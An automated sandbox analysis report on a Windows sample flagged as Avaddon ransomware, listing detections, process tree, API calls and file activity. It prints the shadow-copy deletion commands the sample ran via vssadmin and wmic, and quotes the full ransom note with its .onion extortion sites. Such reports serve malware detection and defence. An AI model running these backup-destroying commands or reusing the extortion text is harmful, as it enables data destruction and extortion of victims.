Windows Analysis Report ab.bin

Overview

General Information

Sample Name: ab.bin (renamed file extension from bin to exe)
Analysis ID: 548854
MD5: 0b486fe0503524cfe4726a4022fa6a68
SHA1: 297dea71d489768ce45d23b0f8a45424b469ab00
SHA256: 1228d0f04f0ba82569fc1c0609f9fd6c377a91b9ea44c1e7f9f84b2b90552da2

Detection

Avaddon
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Avaddon Ransomware
Found ransom note / readme
Antivirus / Scanner detection for submitted sample
Yara detected RansomwareGeneric
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Sigma detected: Shadow Copies Deletion Using Operating Systems Utilities
Sigma detected: Copying Sensitive Files with Credential Data
Yara detected PersistenceViaHiddenTask
Spreads via windows shares (copies files to share folders)
Creates processes via WMI
Machine Learning detection for sample
Modifies existing user documents (likely ransomware behavior)
Machine Learning detection for dropped file
Deletes shadow drive data (may be related to ransomware)
Disables UAC (registry)
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Uses code obfuscation techniques (call, push, ret)
Creates COM task schedule object (often to register a task for autostart)
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Checks if the current process is being debugged
Checks for available system drives (often done to infect USB drives)
Found large amount of non-executed APIs
Uses Microsoft's Enhanced Cryptographic Provider
Contains functionality to delete services
Creates a process in suspended mode (likely to inject code)

Process Tree

  • System is w10x64
  • ab.exe (PID: 6212 cmdline: "C:\Users\user\Desktop\ab.exe" MD5: 0B486FE0503524CFE4726A4022FA6A68)
    • WMIC.exe (PID: 1744 cmdline: wmic SHADOWCOPY DELETE /nointeractive MD5: 79A01FCD1C8166C5642F37D1E0FB7BA8)
      • conhost.exe (PID: 7084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • vssadmin.exe (PID: 5468 cmdline: vssadmin Delete Shadows /All /Quiet MD5: 7E30B94672107D3381A1D175CF18C147)
      • conhost.exe (PID: 7204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • WMIC.exe (PID: 7444 cmdline: wmic SHADOWCOPY DELETE /nointeractive MD5: 79A01FCD1C8166C5642F37D1E0FB7BA8)
      • conhost.exe (PID: 7496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • vssadmin.exe (PID: 7608 cmdline: vssadmin Delete Shadows /All /Quiet MD5: 7E30B94672107D3381A1D175CF18C147)
      • conhost.exe (PID: 7616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • WMIC.exe (PID: 7676 cmdline: wmic SHADOWCOPY DELETE /nointeractive MD5: 79A01FCD1C8166C5642F37D1E0FB7BA8)
      • conhost.exe (PID: 7684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • vssadmin.exe (PID: 7752 cmdline: vssadmin Delete Shadows /All /Quiet MD5: 7E30B94672107D3381A1D175CF18C147)
      • conhost.exe (PID: 7788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • ab.exe (PID: 4876 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe MD5: 0B486FE0503524CFE4726A4022FA6A68)
  • WMIC.exe (PID: 4520 cmdline: wmic SHADOWCOPY DELETE /nointeractive MD5: EC80E603E0090B3AC3C1234C2BA43A0F)
    • conhost.exe (PID: 5876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • WMIC.exe (PID: 4800 cmdline: wmic SHADOWCOPY DELETE /nointeractive MD5: EC80E603E0090B3AC3C1234C2BA43A0F)
    • conhost.exe (PID: 4768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • WMIC.exe (PID: 3148 cmdline: wmic SHADOWCOPY DELETE /nointeractive MD5: EC80E603E0090B3AC3C1234C2BA43A0F)
    • conhost.exe (PID: 1756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • ab.exe (PID: 1864 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe MD5: 0B486FE0503524CFE4726A4022FA6A68)

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

Source | Rule | Description | Author | Strings
C:\Users\Public\Libraries\uCLrcwQ_readme_.txt | JoeSecurity_Avaddon | Yara detected Avaddon Ransomware | Joe Security |

Memory Dumps

Source | Rule | Description | Author | Strings
00000000.00000003.317257973.00000000043E8000.00000004.00000010.sdmp | JoeSecurity_Avaddon | Yara detected Avaddon Ransomware | Joe Security |
00000000.00000003.316985824.00000000043E8000.00000004.00000010.sdmp | JoeSecurity_Avaddon | Yara detected Avaddon Ransomware | Joe Security |
00000000.00000003.324241984.00000000007E5000.00000004.00000001.sdmp | JoeSecurity_PersistenceViaHiddenTask | Yara detected PersistenceViaHiddenTask | Joe Security |
00000000.00000003.324241984.00000000007E5000.00000004.00000001.sdmp | JoeSecurity_Avaddon | Yara detected Avaddon Ransomware | Joe Security |
00000000.00000003.315481275.00000000007E5000.00000004.00000001.sdmp | JoeSecurity_PersistenceViaHiddenTask | Yara detected PersistenceViaHiddenTask | Joe Security |

Sigma Overview

System Summary:

Sigma detected: Shadow Copies Deletion Using Operating Systems Utilities
Source: Process started, Author: Florian Roth, Michael Haag, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community, Andreas Hunkeler (@Karneades): Data: Command: wmic SHADOWCOPY DELETE /nointeractive, CommandLine: wmic SHADOWCOPY DELETE /nointeractive, CommandLine|base64offset|contains: h, Image: C:\Windows\SysWOW64\wbem\WMIC.exe, NewProcessName: C:\Windows\SysWOW64\wbem\WMIC.exe, OriginalFileName: C:\Windows\SysWOW64\wbem\WMIC.exe, ParentCommandLine: "C:\Users\user\Desktop\ab.exe" , ParentImage: C:\Users\user\Desktop\ab.exe, ParentProcessId: 6212, ProcessCommandLine: wmic SHADOWCOPY DELETE /nointeractive, ProcessId: 1744
Sigma detected: Copying Sensitive Files with Credential Data
Source: Process started, Author: Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community: Data: Command: vssadmin Delete Shadows /All /Quiet, CommandLine: vssadmin Delete Shadows /All /Quiet, CommandLine|base64offset|contains: vh, Image: C:\Windows\SysWOW64\vssadmin.exe, NewProcessName: C:\Windows\SysWOW64\vssadmin.exe, OriginalFileName: C:\Windows\SysWOW64\vssadmin.exe, ParentCommandLine: "C:\Users\user\Desktop\ab.exe" , ParentImage: C:\Users\user\Desktop\ab.exe, ParentProcessId: 6212, ProcessCommandLine: vssadmin Delete Shadows /All /Quiet, ProcessId: 5468

Jbx Signature Overview

AV Detection:

Multi AV Scanner detection for submitted file
Source: ab.exe, Virustotal: Detection: 88%
Source: ab.exe, Metadefender: Detection: 65%
Source: ab.exe, ReversingLabs: Detection: 96%
Antivirus / Scanner detection for submitted sample
Source: ab.exe, Avira: detected
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe, Avira: detection malicious, Label: HEUR/AGEN.1136765
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe, Virustotal: Detection: 88%
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe, Metadefender: Detection: 65%
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe, ReversingLabs: Detection: 96%
Machine Learning detection for sample
Source: ab.exe, Joe Sandbox ML: detected
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe, Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe, Code function: 2_2_01304E30 CryptReleaseContext,2_2_01304E30
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe, Code function: 2_2_01309150 CryptEncrypt,2_2_01309150
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe, Code function: 2_2_013091A0 CryptDestroyKey,CryptReleaseContext,2_2_013091A0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe, Code function: 2_2_0130A050 CryptExportKey,2_2_0130A050
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe, Code function: 2_2_0130A0A0 CryptEncrypt,2_2_0130A0A0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe, Code function: 2_2_0130A0E0 CryptExportKey,2_2_0130A0E0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe, Code function: 2_2_01309BE0 CryptAcquireContextW,CryptGenKey,CryptDestroyKey,CryptReleaseContext,2_2_01309BE0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe, Code function: 2_2_01308BC0 CryptAcquireContextW,CryptGenKey,GetFileAttributesW,SetFileAttributesW,CreateFileW,CloseHandle,CloseHandle,CryptDestroyKey,CryptReleaseContext,2_2_01308BC0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe, Code function: 2_2_01309A90 CryptAcquireContextW,GetLastError,CryptAcquireContextW,2_2_01309A90
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe, Code function: 2_2_01309AF0 CryptStringToBinaryA,GetProcessHeap,HeapAlloc,CryptStringToBinaryA,CryptImportKey,GetProcessHeap,HeapFree,2_2_01309AF0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe, Code function: 2_2_01310C10 CryptAcquireContextW,CryptImportKey,CryptSetKeyParam,CryptSetKeyParam,CryptDuplicateKey,CryptEncrypt,CryptEncrypt,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,2_2_01310C10
Source: ab.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: C:\Users\user\Desktop\ab.exe, File created: C:\Users\user\Desktop\uCLrcwQ_readme_.txt
Source: C:\Users\user\Desktop\ab.exe, File created: C:\Users\user\Desktop\GAOBCVIQIJ\uCLrcwQ_readme_.txt
Source: C:\Users\user\Desktop\ab.exe, File created: C:\Users\user\Desktop\LSBIHQFDVT\uCLrcwQ_readme_.txt
Source: C:\Users\user\Desktop\ab.exe, File created: C:\Users\user\Desktop\QNCYCDFIJJ\uCLrcwQ_readme_.txt
Source: C:\Users\user\Desktop\ab.exe, File created: C:\Users\user\Documents\uCLrcwQ_readme_.txt
Source: C:\Users\user\Desktop\ab.exe, File created: C:\Users\user\Documents\GAOBCVIQIJ\uCLrcwQ_readme_.txt
Source: C:\Users\user\Desktop\ab.exe, File created: C:\Users\user\Documents\LSBIHQFDVT\uCLrcwQ_readme_.txt
Source: C:\Users\user\Desktop\ab.exe, File created: C:\Users\user\Documents\QNCYCDFIJJ\uCLrcwQ_readme_.txt
Source: C:\Users\user\Desktop\ab.exe, File created: C:\Users\user\Downloads\uCLrcwQ_readme_.txt
Source: C:\Users\user\Desktop\ab.exe, File created: C:\Users\user\Favorites\uCLrcwQ_readme_.txt
Source: C:\Users\user\Desktop\ab.exe, File created: C:\Users\user\Searches\uCLrcwQ_readme_.txt
Source: C:\Users\user\Desktop\ab.exe, File created: C:\Users\Public\Libraries\uCLrcwQ_readme_.txt
Source: ab.exe, Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Spreading:

Spreads via windows shares (copies files to share folders)
Source: C:\Users\user\Desktop\ab.exe, File created: Z:\$RECYCLE.BIN
Source: C:\Users\user\Desktop\ab.exe, File created: Z:\$RECYCLE.BIN\S-1-5-21-3853321935-2125563209-4053062332-1002
Source: C:\Users\user\Desktop\ab.exe, File created: Z:\$RECYCLE.BIN\S-1-5-21-3853321935-2125563209-4053062332-1002\desktop.ini
Source: C:\Users\user\Desktop\ab.exe, Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\Desktop\ab.exe, Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\Desktop\ab.exe, Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\Desktop\ab.exe, Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Users\user\Desktop\ab.exe, Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Users\user\Desktop\ab.exe, Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32
Source: C:\Users\user\Desktop\ab.exe, Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer
Source: C:\Users\user\Desktop\ab.exe, Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation
Source: C:\Users\user\Desktop\ab.exe, File opened: z:, x:, v:, t:, r:, p:, n:, l:, j:, h:, f:, b:, y:, w:, u:, s:, q:, o:, m:, k:, i:, g:, e:, c:, a:
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe, Code function: 2_2_0130D280 FindFirstFileW,FindNextFileW,FindClose,2_2_0130D280
Source: ab.exe, 00000000.00000003.332133858.00000000043E8000.00000004.00000010.sdmp, String found in binary or memory: https://www.torproject.o
Source: ab.exe, uCLrcwQ_readme_.txt, String found in binary or memory: https://www.torproject.org/

Spam, unwanted Advertisements and Ransom Demands:

Yara detected Avaddon Ransomware
Source: Yara match, File source: Process Memory Space: ab.exe PID: 6212, type: MEMORYSTR
Source: Yara match, File source: C:\Users\Public\Libraries\uCLrcwQ_readme_.txt, type: DROPPED
Found ransom note / readme
Source: C:\Users\user\Documents\QNCYCDFIJJ\uCLrcwQ_readme_.txt, Dropped file: -------=== Your network has been infected! ===-------***************** DO NOT DELETE THIS FILE UNTIL ALL YOUR DATA HAVE BEEN RECOVERED *****************All your documents, photos, databases and other important files have been encrypted and have the extension: .bCcBDeabeaYou are not able to decrypt it by yourself. But don't worry, we can help you to restore all your files!The only way to restore your files is to buy our special software. Only we can give you this software and only we can restore your files!We have also downloaded a lot of private data from your network.If you do not contact as in a 3 days we will post information about your breach on our public news website (avaddongun7rngel.onion) and after 7 days the whole downloaded info.You can get more information on our page, which is located in a Tor hidden network.How to get to our page--------------------------------------------------------------------------------|| 1. Download Tor browser - https://www.torproject.org/|| 2. Install Tor browser|| 3. Open link in Tor browser - avaddonbotrxmuyl.onion|| 4. Follow the instructions on this page|--------------------------------------------------------------------------------Your ID:--------------------------------------------------------------------------------
Yara detected RansomwareGeneric
Source: Yara match, File source: Process Memory Space: ab.exe PID: 6212, type: MEMORYSTR
Modifies existing user documents (likely ransomware behavior)
Source: C:\Users\user\Desktop\ab.exe, File moved: C:\Users\user\Desktop\QNCYCDFIJJ\QNCYCDFIJJ.docx
Source: C:\Users\user\Desktop\ab.exe, File deleted: C:\Users\user\Desktop\QNCYCDFIJJ\QNCYCDFIJJ.docx
Source: C:\Users\user\Desktop\ab.exe, File moved: C:\Users\user\Desktop\QNCYCDFIJJ\EFOYFBOLXA.jpg
Source: C:\Users\user\Desktop\ab.exe, File deleted: C:\Users\user\Desktop\QNCYCDFIJJ\EFOYFBOLXA.jpg
Source: C:\Users\user\Desktop\ab.exe, File moved: C:\Users\user\Desktop\BNAGMGSPLO.jpg
Deletes shadow drive data (may be related to ransomware)
Source: unknown, Process created: C:\Windows\System32\wbem\WMIC.exe wmic SHADOWCOPY DELETE /nointeractive
Source: C:\Users\user\Desktop\ab.exe, Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic SHADOWCOPY DELETE /nointeractive
Source: C:\Users\user\Desktop\ab.exe, Process created: C:\Windows\SysWOW64\vssadmin.exe vssadmin Delete Shadows /All /Quiet
Source: vssadmin.exe, 00000010.00000002.285725415.00000000034C7000.00000004.00000020.sdmp, Binary or memory string: - Code: ADMPROCC00001737- Call: ADMPROCC00001712- PID: 00005468- TID: 00005608- CMD: vssadmin Delete Shadows /All /Quiet - User: Name: computer\user, SID:S-1-5-21-3853321935-2125563209-4053062332-1002
Source: vssadmin.exe, 00000010.00000002.284948508.0000000001340000.00000004.00000040.sdmp, Binary or memory string: vssadminDeleteShadows/All/QuietO1R
                      Source: vssadmin.exe, 00000010.00000002.285712990.00000000034C0000.00000004.00000020.sdmpBinary or memory string: vssadmin Delete Shadows /All /Quiet
                      Source: vssadmin.exe, 00000010.00000002.285712990.00000000034C0000.00000004.00000020.sdmpBinary or memory string: vssadmin Delete Shadows /All /Quiet'
                      Source: vssadmin.exe, 00000010.00000002.284764824.000000000107C000.00000004.00000001.sdmpBinary or memory string: - Code: ADMPROCC00001737- Call: ADMPROCC00001712- PID: 00005468- TID: 00005608- CMD: vssadmin Delete Shadows /All /Quiet - User: Name: computer\user, SID:S-1-5-21-3853321935-2125563209-4053062332-1002
                      Source: vssadmin.exe, 00000010.00000002.284764824.000000000107C000.00000004.00000001.sdmpBinary or memory string: - Code: ADMPROCC00001737- Call: ADMPROCC00001712- PID: 00005468- TID: 00005608- CMD: vssadmin Delete Shadows /All /Quiet - User: Name: computer\user, SID:S-1-5-21-3853321935-2125563209-4053062332-1002 -
                      Source: vssadmin.exe, 00000019.00000002.291742139.0000000000CEC000.00000004.00000001.sdmpBinary or memory string: - Code: ADMPROCC00001737- Call: ADMPROCC00001712- PID: 00007608- TID: 00007612- CMD: vssadmin Delete Shadows /All /Quiet - User: Name: computer\user, SID:S-1-5-21-3853321935-2125563209-4053062332-1002
                      Source: vssadmin.exe, 00000019.00000002.291742139.0000000000CEC000.00000004.00000001.sdmpBinary or memory string: - Code: ADMPROCC00001737- Call: ADMPROCC00001712- PID: 00007608- TID: 00007612- CMD: vssadmin Delete Shadows /All /Quiet - User: Name: computer\user, SID:S-1-5-21-3853321935-2125563209-4053062332-1002 -
                      Source: vssadmin.exe, 00000019.00000002.292512976.0000000003530000.00000004.00000040.sdmpBinary or memory string: vssadminDeleteShadows/All/Quiet
                      Source: vssadmin.exe, 00000019.00000002.291815635.0000000000DC0000.00000004.00000020.sdmpBinary or memory string: C:\Users\user\Desktop\C:\Windows\SysWOW64\vssadmin.exevssadmin Delete Shadows /All /QuietC:\Windows\SYSTEM32\vssadmin.exeWinSta0\Default
                      Source: vssadmin.exe, 0000001E.00000002.299021550.0000000000FD0000.00000004.00000020.sdmpBinary or memory string: C:\Users\user\Desktop\C:\Windows\SysWOW64\vssadmin.exevssadmin Delete Shadows /All /QuietC:\Windows\SYSTEM32\vssadmin.exeWinSta0\Default*
                      Source: vssadmin.exe, 0000001E.00000002.299334254.00000000035A0000.00000004.00000040.sdmpBinary or memory string: vssadminDeleteShadows/All/Quiet-
                      Source: vssadmin.exe, 0000001E.00000002.298998635.0000000000E3C000.00000004.00000001.sdmpBinary or memory string: - Code: ADMPROCC00001737- Call: ADMPROCC00001712- PID: 00007752- TID: 00007756- CMD: vssadmin Delete Shadows /All /Quiet - User: Name: computer\user, SID:S-1-5-21-3853321935-2125563209-4053062332-1002
                      Source: vssadmin.exe, 0000001E.00000002.298998635.0000000000E3C000.00000004.00000001.sdmpBinary or memory string: - Code: ADMPROCC00001737- Call: ADMPROCC00001712- PID: 00007752- TID: 00007756- CMD: vssadmin Delete Shadows /All /Quiet - User: Name: computer\user, SID:S-1-5-21-3853321935-2125563209-4053062332-1002 -
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exeCode function: 2_2_01309AF0 CryptStringToBinaryA,GetProcessHeap,HeapAlloc,CryptStringToBinaryA,CryptImportKey,GetProcessHeap,HeapFree,2_2_01309AF0
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exeCode function: 2_2_01310C10 CryptAcquireContextW,CryptImportKey,CryptSetKeyParam,CryptSetKeyParam,CryptDuplicateKey,CryptEncrypt,CryptEncrypt,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,2_2_01310C10

                      System Summary:

                      Source: ab.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exeCode function: 2_2_013155902_2_01315590
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exeCode function: 2_2_0130ACE02_2_0130ACE0
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exeCode function: 2_2_012F91802_2_012F9180
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exeCode function: 2_2_01347A302_2_01347A30
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exeCode function: 2_2_013104302_2_01310430
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exeCode function: 2_2_012FE4A02_2_012FE4A0
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exeCode function: 2_2_01358C8F2_2_01358C8F
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exeCode function: 2_2_0134A5EB2_2_0134A5EB
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exeCode function: 2_2_013106102_2_01310610
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exeCode function: 2_2_012FAEE02_2_012FAEE0
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exeCode function: String function: 0132F1B6 appears 34 times
                      Source: ab.exe, 00000000.00000003.274727314.0000000000823000.00000004.00000001.sdmpBinary or memory string: OriginalFilenametaskhost.exej% vs ab.exe
                      Source: ab.exe, 00000000.00000000.271797098.000000000119C000.00000002.00020000.sdmpBinary or memory string: OriginalFilenametaskhost.exej% vs ab.exe
                      Source: ab.exe, 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmpBinary or memory string: OriginalFilenametaskhost.exej% vs ab.exe
                      Source: ab.exe, 00000023.00000002.438717484.00000000013AC000.00000002.00020000.sdmpBinary or memory string: OriginalFilenametaskhost.exej% vs ab.exe
                      Source: ab.exeBinary or memory string: OriginalFilenametaskhost.exej% vs ab.exe
                      Source: ab.exe.0.drBinary or memory string: OriginalFilenametaskhost.exej% vs ab.exe
                      Source: C:\Users\user\Desktop\ab.exeSection loaded: onecoreuapcommonproxystub.dll
                      Source: C:\Users\user\Desktop\ab.exeSection loaded: propsys.dll
                      Source: C:\Users\user\Desktop\ab.exeSection loaded: napinsp.dll
                      Source: C:\Users\user\Desktop\ab.exeSection loaded: pnrpnsp.dll
                      Source: C:\Users\user\Desktop\ab.exeSection loaded: nlaapi.dll
                      Source: C:\Users\user\Desktop\ab.exeSection loaded: mswsock.dll
                      Source: C:\Users\user\Desktop\ab.exeSection loaded: dnsapi.dll
                      Source: C:\Users\user\Desktop\ab.exeSection loaded: winrnr.dll
                      Source: C:\Users\user\Desktop\ab.exeSection loaded: fwpuclnt.dll
                      Source: C:\Users\user\Desktop\ab.exeSection loaded: rasadhlp.dll
                      Source: C:\Users\user\Desktop\ab.exeSection loaded: cscapi.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exeCode function: 2_2_012FBE70 OpenSCManagerW,OpenServiceW,DeleteService,CloseServiceHandle,CloseServiceHandle,2_2_012FBE70
                      Source: ab.exeVirustotal: Detection: 88%
                      Source: ab.exeMetadefender: Detection: 65%
                      Source: ab.exeReversingLabs: Detection: 96%
                      Source: C:\Users\user\Desktop\ab.exeFile read: C:\Users\user\Desktop\ab.exe
                      Source: ab.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\ab.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknownProcess created: C:\Users\user\Desktop\ab.exe "C:\Users\user\Desktop\ab.exe"
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe
                      Source: unknownProcess created: C:\Windows\System32\wbem\WMIC.exe wmic SHADOWCOPY DELETE /nointeractive
                      Source: unknownProcess created: C:\Windows\System32\wbem\WMIC.exe wmic SHADOWCOPY DELETE /nointeractive
                      Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Windows\System32\wbem\WMIC.exe wmic SHADOWCOPY DELETE /nointeractive
                      Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\ab.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic SHADOWCOPY DELETE /nointeractive
                      Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\ab.exeProcess created: C:\Windows\SysWOW64\vssadmin.exe vssadmin Delete Shadows /All /Quiet
                      Source: C:\Windows\SysWOW64\vssadmin.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\ab.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic SHADOWCOPY DELETE /nointeractive
                      Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\ab.exeProcess created: C:\Windows\SysWOW64\vssadmin.exe vssadmin Delete Shadows /All /Quiet
                      Source: C:\Windows\SysWOW64\vssadmin.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\ab.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic SHADOWCOPY DELETE /nointeractive
                      Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\ab.exeProcess created: C:\Windows\SysWOW64\vssadmin.exe vssadmin Delete Shadows /All /Quiet
                      Source: C:\Windows\SysWOW64\vssadmin.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe
                      Source: C:\Users\user\Desktop\ab.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exeCode function: 2_2_012FB140 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,GetLastError,InitiateShutdownW,2_2_012FB140
                      Source: C:\Users\user\Desktop\ab.exeWMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
                      Source: C:\Users\user\Desktop\ab.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe
                      Source: classification engineClassification label: mal100.rans.spre.troj.evad.winEXE@27/228@0/0
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exeCode function: 2_2_012FAB30 GetModuleFileNameW,CopyFileW,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,VariantInit,VariantInit,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,VariantClear,SysAllocString,SysFreeString,2_2_012FAB30
                      Source: C:\Users\user\Desktop\ab.exeFile read: C:\$RECYCLE.BIN\S-1-5-21-3853321935-2125563209-4053062332-1002\desktop.ini
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exeCode function: 2_2_01312230 GetDiskFreeSpaceW,2_2_01312230
